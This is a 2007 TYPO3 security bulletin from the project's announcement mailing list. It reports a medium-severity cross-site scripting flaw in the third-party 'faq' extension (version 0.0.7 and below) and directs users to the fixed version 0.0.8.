[TYPO3-announce] TYPO3 Security Bulletin 20070716-1: Cross Site Scripting vulnerability in faq
Lars Houmark
lars at typo3.org
Mon Jul 16 13:32:22 CEST 2007
Dear users of TYPO3,
It has been discovered that the extension faq is susceptible to cross
site scripting (XSS) attacks, making it possible to execute arbitrary
JavaScript.
==== Component Type ====
Third party extension. This extension is not part of the TYPO3
default installation
==== Affected Versions ====
Version 0.0.7 and all versions below
==== Vulnerability Type ====
Cross Site Scripting
==== Severity ====
medium
==== Problem Description ====
Failing to filter user input the extension is susceptible to cross
site scripting (XSS) attacks, making it possible to execute arbitrary
JavaScript.
==== Solution ====
An updated version is available from the TYPO3 extension manager and at
http://typo3.org/extensions/repository/view/faq/0.0.8/
==== General advice ====
Follow the recommendations that are given in the TYPO3 Security
Cookbook [1].
Keep notice of the TYPO3 security bulletin page [2].
==== Credits ====
Credits go to security team member Ekkehard Gümbel, who discovered
the issue and author Markus Lange, who made a fixed version available.
[1] http://typo3.org/fileadmin/security-team/
typo3_security_cookbook_v-0.5.pdf
[2] http://typo3.org/teams/security/security-bulletins/
Regards,
Lars Houmark
lars at typo3.org
More information about the TYPO3-announce
mailing list